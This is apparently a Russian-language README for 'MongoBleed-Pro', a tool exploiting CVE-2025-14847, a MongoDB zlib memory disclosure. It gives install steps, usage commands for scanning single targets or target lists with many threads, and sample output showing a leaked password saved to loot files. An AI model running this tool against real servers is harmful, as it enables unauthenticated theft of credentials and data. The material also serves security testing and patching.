
Эксплойт-инструмент для CVE-2025-14847, уязвимости раскрытия памяти в MongoDB, позволяющий многопоточное извлечение конфиденциальных данных и секретов из уязвимых экземпляров.
Продвинутый инструмент для эксплуатации утечки памяти MongoDB
Keep Learning | Keep Hacking with Alexcyberx
MongoBleed-Pro — это продвинутый инструмент для эксплуатации CVE-2025-14847, критической уязвимости раскрытия памяти в обработке сжатия zlib в MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.
Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте соответствующее разрешение перед тестированием.
# Клонируйте репозиторий
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Установите зависимости
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 ЗАПУСК ПОСЛЕДОВАТЕЛЬНОСТИ ИЗВЛЕЧЕНИЯ ПАМЯТИ 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Цель захвачена: 192.168.1.100:27017
✓ Порт ОТКРЫТ
☠️ УЯЗВИМО! Запуск атаки...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ ТРОФЕЙ ПОЛУЧЕН: 🔐 Пароль
→ admin_pass=SuperSecret123
╔══════════════════ ИЗВЛЕЧЕНИЕ ЗАВЕРШЕНО ══════════════════╗
║ 💾 Извлечено байт: 125,847
║ 📦 Уникальных фрагментов: 342
║ 🔑 Найдено секретов: 5
╚══════════════════════════════════════════════════════════╝
| Файл | Описание |
|---|---|
loot_<host>.txt | Извлечённые секреты в читаемом формате |
dump_<host>.bin | Сырой дамп памяти для ручного анализа |
Если вы администратор MongoDB, обновитесь до исправленных версий:
alexcyberx
Этот проект лицензирован на условиях лицензии MIT — подробнее в файле LICENSE.
Если этот инструмент оказался для вас полезным, поставьте ⭐ на GitHub!
「 Keep Learning | Keep Hacking 」
Сделано с ❤️ by alexcyberx
| Свойство | Значение |
|---|
| CVE ID | CVE-2025-14847 |
| Тип уязвимости | Раскрытие памяти |
| Затронутые версии | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Корневая причина | Переполнение буфера при чтении в декомпрессии zlib |
| Воздействие | Неаутентифицированная удалённая утечка памяти |
| Аргумент | Описание | По умолчанию |
|---|
--target | IP/URL цели | Интерактивный запрос |
--file | Файл со списком целей | None |
--threads | Количество потоков | 50 |
--min-offset | Минимальное смещение памяти | 20 |
--max-offset | Максимальное смещение памяти | 8192 |